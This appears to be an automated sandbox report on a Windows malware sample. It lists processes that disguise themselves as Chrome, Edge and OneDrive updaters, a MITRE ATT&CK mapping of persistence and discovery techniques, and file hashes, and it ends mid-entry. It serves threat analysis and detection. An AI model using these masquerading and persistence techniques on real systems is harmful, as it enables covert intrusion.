"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3496

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5412

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6104

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
PID:5420

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:4432

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
PID:5968

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:5976

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
PID:2364

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:1528

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
PID:2192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5264

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
PID:4408

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:5268

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
PID:5436

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
PID:1944

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:5688

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
PID:6040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
655a5640d5a66f8584d4a4a0abe30dc7

SHA1
868e8c023a226fba53cfdfaa385024c68c5e5978

SHA256
ee229d87a824c0b7551b1da749caf52331418e1024ad5d3fc367588abc59c30e

SHA512
bf558651c4c982752b906ee945aa120a9e134c4db2cfddb67966a26fc5ad90cc5ee0107b96a5174a555a688071121e3b19ad66dacc00f1e0005e64270029e4ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
caac9f24e75f6e97bee56dca50d832c7

SHA1
67acbec285398e33f359243743d78c1d332bff91

SHA256
bba0b7f60204b4d538f591e4f287af56db21b47f67f4c034f507a86a7c3e4c2d

SHA512
8098ebdf5a8aa3bc64df2f0d9bd03c070116acfbb9d2048bcdedf613ace1aaa4d5e89c2980bf3999557e73ccc472df8b02b478485858a60fa8449b9f239e1494

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
1c5e122115a558ddbcd7f7b20f8e31c2

SHA1
42d1bcff170341abf99f60b78b28a117881b9f53

SHA256
5852d9c8ec8da9bd2632677608811f4559134c73f64a70a870868b52c4a23e95

SHA512
b82540a5977185d5112ab03d778048ed5a5971f7c90163f87981b3ca29d7326408094e1c469e4edc3620dfc930faf16dabd02c8d350ad07036df13f1ecf02ab6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
96ec9285090e04f1d843eaabfd6d7d90

SHA1
65e8289cac3561779da0fcc9d6329a2f1c50d8c3

SHA256
f1caaa85eeecc1a7ad814eb9ff19017692f802e5849b4d67ed89c1666ca03e7c

SHA512
2581cf99eeb1ee45640dfcf79d4f8c9319fd6f0c1e8545911c0a7ff39f693ddb9e32c5d95fefce1a5f8945f12ce0f7edbac235f8f3dfc6aae327f608bde409d2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a89cd8d935f89c256ed6739ce99fff62

SHA1
e5ee993d01b30c19667aa0729f0be5bed7d32566

SHA256
4860fd35603fc7627f90b9ea184833759b0941560db29dda14f47aec1e05f4a7

SHA512
0f739a689d30530fe4e4a47d7cba5f1719795c405608ced482c83bbbc6097156fab46ae26b948a161f577e7dabd4f7495ca6cedc4b345167201a1f5387f7acc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
18a03b2878fc83ebd11e63945e87fd79

SHA1
a9386b25200f7e5fcd334e00ef950ccb633c1352

SHA256
3e02cff41e17242f27994bdaead1e10ba059bdc05e4d0407c0cba436c11999c0

SHA512
949de1386f3af264bc2a5f7bc47fdc47798b8c60f287e9e19e646f59f8a3dfa5c3e2fb071e18c3301192eedad27f0a5a2fb81e4c6bc4e87c9e5886facda287bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8ec302c0ba5d6a198aeef9df769e2485

SHA1
cc566d65fb5746b8e9c564676a71c2dd1fdb96f7

SHA256
91ccbf0be6b43b587f59ceb2d5445402e5aee906d1b15945aec795f8f8369560

SHA512
afed1be6626b9e9bd5bf6af11bdc705e60c0546613c37bddcdd4dbb675146a09c394ce417c1a45102e4114782a68a5f1b9a8870ab14fb5bf25965cca9e08081f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4bf43fb21ef308459c84283273b1974b

SHA1
154b6926179db35941b316ee65451a16ad576a6c

SHA256
483a890985090a1b143aea738c0b44b6c3a0b043a6d9181aac144aec71e60921

SHA512
af76ef3f21a942d3ca05c2bdaa4cece8c62a77969a75a255c02d61249b339e8d077fd64467775eec3af753d98621cb2fdf9b1097b15e8b419ffece867ab5568f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7bdc3853c99c9543597468880179c78c

SHA1
fd78d5934a3e02e40841f5f57b507142a42d381f

SHA256
9ba6d4ec5173ddce934aafb400f5da5fdd84d3a6f6fc961756563c6b30c3f987

SHA512
2e85d0b4b7a704505e8d797aa7b1a20a3d3d599621a5c61084280c1200286659ef22b9b24ec01b78e281fc0ff3f4f85325e8cb2de5f8e3e7f9870bc81a7b1d8c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
72b7017c3e111fa7431ffd9ee9dd84e2

SHA1
a897ab546786681c2baed4428115b683a098a9ad

SHA256
cc8469ff502d18479ffecbb66e276b7882596976c2a0ab4584343b7864717cc9

SHA512
d016f9a0189e39aa5949aaf04a39261d7842cded6c4255614ffc50d101f07553947f9264f5689f2968ead69e35a58e880af62e3cc86be13fc7943fac6cbae000

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
37ccbf45b45d5f20407ff4150aaa6b2b

SHA1
3c92762356d30bc2ca396fec5f75185dcf6fc5f5

SHA256
f0e1eabb3b6d90593c545308244705b5fd495d7eb7c94ac0e78b418b7d275377

SHA512
1ea55c0a5d1a52be0ead3f035eba93e7fe213b2da11dd63c91dad4a74f55d30cf3f278c6632da7da2bdc7ef6bb79b8b552ee049200ab1cc9e5836c287667263a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
112f034a50fb7c4e0eb26bff3541b256

SHA1
a084a23755619301c00aa4428831d25b51158c68

SHA256
81b1af2f1f872a278c1d455d19c3866648f87e7be5745d3ae48bfc881a1cc0d4

SHA512
84657b8c37db8bb3f3ead44a5bd9a8dcce10ee523adf0e940d832482417881f76590622219f755f22646441f9eae19c839ee4dc88567f8ab43b8ada9acf21746

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d934f8a6a9d53d16c5a7cf15c41a472f

SHA1
05e371b2eba1a478b2b5e9f6ecc0e6bef7048029

SHA256
aab93b435db60ac21aada0d3b078fffbb1fc2327cd86129b156c377891123a22

SHA512
6f8dfd2336c8eb6e10517f0a8624b21488017c53e575c0c6152658128024b25a2b931f33f8b5888277efc648f965c458a71760025f07d1b87072ba702b5d035f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a076b7a44bf1816ecda155e918ea267f

SHA1
ff5e0607d3f16c9c0e649994a1d14ac1be085965

SHA256
b11ef50196e7f0a19bcf3b12e7657c81061f5180f9d5d72614a148578059da30

SHA512
f1d29d65947e7997fd66617286f01bb9d0a5f09642d52de3dd1f75160636f447e03f10181c62ba01c3b7b6fc643cc7ec88d69449cc39a259cd8dd7cae4bdc125

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2d440a8ec86428101d80ff4a24bce579

SHA1
bb70051bbec00a9ffe86bed437d966bbfcc6b9b0

SHA256
d7f5399b61f31da3a25931336f5a41d54acbfbe9e755fd4002992d18ac4652a1

SHA512
2b58dce2721bf84c41ba772f1f9c69a2d812dfc22bccb8f30b90d295a7b9738087e26377eda56d356534ac7e787cd9591c9d4b66a896292e57f16b92eec342cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
50aa0b03c44cd1929b90f49157f8bf46

SHA1
c9f007070264e27d4fa2f3f7bde7552bf60d15a3

SHA256
86f3be0209626511b1469b8b394b074d3ea9908f1e131dded538930af5056d7b

SHA512
39487360b6b0d1bd6224395724534ee1a6c26e3c4a324c702492fe374b755ecacebba1763f5938f3d9f32c3c9c115689f1fbfb643ef513d4e38ffe5d3a8ebaf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1b19f0a8a0a3c2169570d15e01849214

SHA1
b34bbedb44b5b4379d28d6ae534c4fc8129ead47

SHA256
40b174fbabfe896371b832e6d4c58082e82aa82270b402dd3e162cc15ec01677

SHA512
5ddea4c6ac1e381e7aad9b62cd0a436f097dadf4712dae88aa007b2a5cd436013fc178ce4a7391da2554878eb6b1e2f1e3ffcecb0ddffe36999334450b8b9e2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f0e523c4497e5160cb8a8453238cdc68

SHA1
a2df806a7c3fd08384e5441b88339f2b866f10bd

SHA256
9b2c5bde805ddd40bb13b85cb4b3008db55fe6e20287401b2831be1be9a1b57d

SHA512
720446f1c0f85fcf137092fa134a0b594e4118630203a9d59c6b7887f0c3c7142631b626f0b8ef1a443ec7b31b380d45491d082a18a2fb3eea83942f51591966

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
80159041a28bd5a112bcb7e609e3cb9a

SHA1
f203c83ac5c64ab0405db84ff51c36cf36af60f5

SHA256
53fc0cc90a8121ccd165901bf4f1d9cd781cc0ff8d4bac691804c844bf72b084

SHA512
2840eae09d019a85675b7e1932123adc27f91bde68620e3c55c4f00e420e799c8d2ed8769288f13d62051bd26bdf8fb4ac8271f4222032f937bcad58b1a7706d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
53e6d2e5962f2ae004d63d7dd9769447

SHA1
2ca3998e9e4b736be8ddc5e907f016c135ffa092

SHA256
fa7f417d3c717365fd7df6cfdc6ce78397d54f038a9f2d8bb3d79360e01f7615

SHA512
1e1c261f7d4819509c89991f9c9efbaffd295f670f0bad9e98b0dc945fc95d000c09b7f2fd194515bb0cd1472288e15e4d453a1caf04aaf455ec4de6c00c0f1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
60e8932aea3045372c754adee4ec77cb

SHA1
258e53e4019035479f9c0d3c12d53f82d4dd7632

SHA256
a82e07aba863d549391b2b2fefbeeef069c4ea2b239cc2e198b53fc5401344bd

SHA512
1f2fb252f2d134a37256c14f93677219ad60c0331a5982087eccaf25e995366422daf85a633b2a2742b094b3240c18b653ed6d1b5512311fd0de9459a50bc7e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
51043156d048dd22c7c2fbf6a0565989

SHA1
090b2b6fb0f178361b67ca6974b892a2c7584a7b

SHA256
d623f25a4931d38d64bc098cf8082ca078bc9f50fa17eec2d1a7452f5e5ae7f2

SHA512
40947da3a068e1d173e0912f7a366d190791af9cbd43fa2c5643cee0e252b69eae26dc520c0e90db41b4a63008f07ec2d87a17a6d7f01a97c7272face879a039

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
b1c51e73a71d481291e6becb2b432dbf

SHA1
463a9d7f738de3323f4cf0a2c112dc36c8470aa1

SHA256
4bf9a647ebfffbf6054b4d38573b939d5ac9e87105a07095ed8c091a7c77058c

SHA512
3bf415cbba172c0bb9c1f533c5bc44a6020fbbee310c482258603079ef1105f7d1d182b9d18ead04f32c8ca30c50ff18f7c0371b31d573c1dc0518b36c50bd62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
9896f5df3d859b1c1c2b1f4bca828c7e

SHA1
f795be8cd9f6f8c752fbaef2c28a691703af764f

SHA256
df6d5f017c3d8ed76c6c12bb6bc811cd2f32ecd550399ce091b0e7702e2e4de4

SHA512
b56adf40d64ca5becb21f0d0ab8696a4206809a3f58a3997cf6c05de52d9b2408f89b35871e3c183ac553a7d21fd16319944718dece569de4681b1aa99995821

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
6a8808523670ebdbcc0173cf0803f791

SHA1
4c6ab903c5bd8cc7238da6249ab0c16656387c36

SHA256
9a87b0e4c2d45497e795119d956508977ca67b94ee0036a30ff716190ecf34e1

SHA512
999cc7c25f2e4c893f3b0f3182dc961d70419a14f46d0ebd7bc0970d1ecb12327d46503f785aba108e7012c130d201b39831e9a37ddc1e5964fd34e8b5f277e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
230KB

MD5
9ddd29caff338d0a6cf3fef27217885f

SHA1
5009602e2f1a880b522ea34e60dd993bdb7200a6

SHA256
2fff7229a864e20141f128c93562c4dfccf2a768791ef3632a7359b64c27fbb3

SHA512
5aaf07fd8fcf89a7cf1b6bc1480ea3494d4fc7858f0f5eec2c20f475b56fa71f13271b2d5ff88ec3774a57ca48c8d883fdbfa049ad8d3ec65f99b29fc80e5579

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
cf86393a872a717a850498f40c4ca6ba

SHA1
7cc79b0e7f174bf56f3de7fd39d42b3ae9a8d3b0

SHA256
e1b217e55862666fe10e7548cf4a44cc111a005ecb5f0eecd6311b720faa6a31

SHA512
975ec13a02f3abb81503230adb86b1a456f90e615b2d3d23f77e9fd68a5e26518e99819bdf49304393515d64396c0eb249b3d9c98aa8b94ead497b079b6e2307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
554d6d27186fa7d6762d95dde7a17584

SHA1
93ea7b20b8fae384cf0be0d65e4295097112fdca

SHA256
2fa6145571e1f1ece9850a1ac94661213d3e0d82f1cef7ac1286ff6b2c2017cb

SHA512
57d9008ccabc315bd0e829b19fe91e24bab6ef20bcfab651b937b0f38eec840b58d0aed092a3bbedd2d6a95d5c150372a1e51087572de55672172adc1fc468a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a28bb0d36049e72d00393056dce10a26

SHA1
c753387b64cc15c0efc80084da393acdb4fc01d0

SHA256
684d797e28b7fd86af84bfb217d190e4f5e03d92092d988a6091b2c7bbbd67c1

SHA512
20940fee33aa2194c36a3db92d4fd314ce7eacc2aa745abec62aa031c2a53ba4ff89f2568626e7bd2536090175f8d045c3bb52c5faa5ecc8da8410ab5fc519f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
d828e64e91ea75781827d1e8dde1b482

SHA1
c968594affe2b78fcdd180f7d50574c5b5d307e6

SHA256
0cc77086741fcc455bce797b3eb2866b7725e11011e0487d7254a76bf5fe278d

SHA512
3d150769af768f470c30ee9fe86ca63b4a8e7965924ce7a7a3d66e2d77e0e184cc47657cd236416e9e15532975e2f5cbf3d8d46bb2d52527a9589b0030da010a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
387B

MD5
fd99c14603fa3f97cea7cf75d7390fbc

SHA1
3ef775bbf369230dedd3a8f39b3d4ec9d850bd67

SHA256
f5b5b641b47325e90e1292d429b37293fe65e959030036a5f0b8a2d361c63c3e

SHA512
ea8140a59d104a2197fdaf23d9ca198f089082a18223be18c4c92e9351ee7f5423eb08a71578cec5dc31fa7be879ac3b839e84cf2e7fcb6fb507a0cb1c19df48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cdf19e0f2676580f0010f91573d698f8

SHA1
4d9a240d2e32c806fb6b3b077562cb3ee9995f0f

SHA256
81b27fcd26b192ac72fbd0968b34f2c4f567e05e9eb3bae0191a72c62d2d543a

SHA512
d0fcefc267d1e87cef89c83153adb4994a42dcdc1bd35714f8d1f196f2721b4971904d5b84c13d979681c2d70fd185876aab34f5b76420555f6bc82d28d17c0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dfdbc6eedaac166e2dd1a954c26a7083

SHA1
86ade62a9d43095de5a5d2af13582c63e48fba58

SHA256
5cb23145ce9b65a8801394409e071b1f26233cfa19719c3c3107ea813895baa5

SHA512
e6fc3c5f6b407dbf2aeccee716aaa59e03d01e487e8819931e802fb10bc7a7ba9d7ca65a7e49c453eca46f195baedd20db75def0365745c134801fea3388c64e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9b21aba0e437ebfc946371e6613b0a62

SHA1
b0db921233ed7b3be4224fefb6937564380b2bae

SHA256
fc726fecc21c7c94c09a3341dbcf2ef3591cd6713ff07795fd414d2bb2a1cd5f

SHA512
d808436fe1fdb0dd4385a5c34bd8126686f12edb63e3edbd483473964aa294aed1e2f426a8787efd486e8c0254d1f51cd540b544af7b5252114be41e52f94c7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
929273ddee61b359ae5d3442fabdd6f5

SHA1
854fd5dccb48b7631d566e555db4933b21ee29a7

SHA256
52f138f15c54ef002c626a95dc925d3492db5f07f0eaab7545c108546a7e6cc4

SHA512
e89c92ed6ea6e1b82f9ad4182742bea8227597062236f9ff6959305fa2d972b43533d48c82f16e0814ad8b2676d00bec20aec6258794dd137560baf8395db351

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
efb94ff3f89a50b1eb25f52e8be530bb

SHA1
c170c9cc16a2f5a8bcf9186cb23f93d8d5d05fbd

SHA256
368428ba4f16b3496dbc1a5faf39cd05fb455e2d966c9ab4976c42192f805dba

SHA512
0bd0f6f0e2ab711fc40408d4a33a28710d49fb9c3ab3b48105ef751cc58121985fd474f98dc99406c898709962e0f662c34556c7e674baac953102e9d7f58f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d11b0fdf3923965fa79a1fda115dd806

SHA1
d79148b8930a07352979967d6f89774746496a2f

SHA256
c8a7379ab2301a6596fa41979d2ee9d4a7080774ebdb29d62e42e9d25df0b044

SHA512
c01235469c3bed63c8ae923cf0eb5742bf2028aa168f9f38c4a6010d5304badb96a58d758731d9f5159b5d1b319a040faf50af3751ae454428fcf91d31b17390

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
e36cf90af547b0190bd47cd18a986610

SHA1
e78f34e0fd513773a4a7f6af0dfe4b5a0456a78f

SHA256
20380111cca8adfe35b580b133184ed36f3c6dbcbe495f58fd9ad1db627bf860

SHA512
424b840b88a73be9e78f6f0e4b4a79f3f82641cc6ce1ffeb61ba021abb1a76723ba78f6764712ccf54dd1086d15379d619fcac07fd8405dd1aed24de18495e89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4914eb0b2ff51bfa48484b5cc8454218

SHA1
6a7c3e36ce53b42497884d4c4a3bda438dd4374b

SHA256
7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

SHA512
83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cef328ddb1ee8916e7a658919323edd8

SHA1
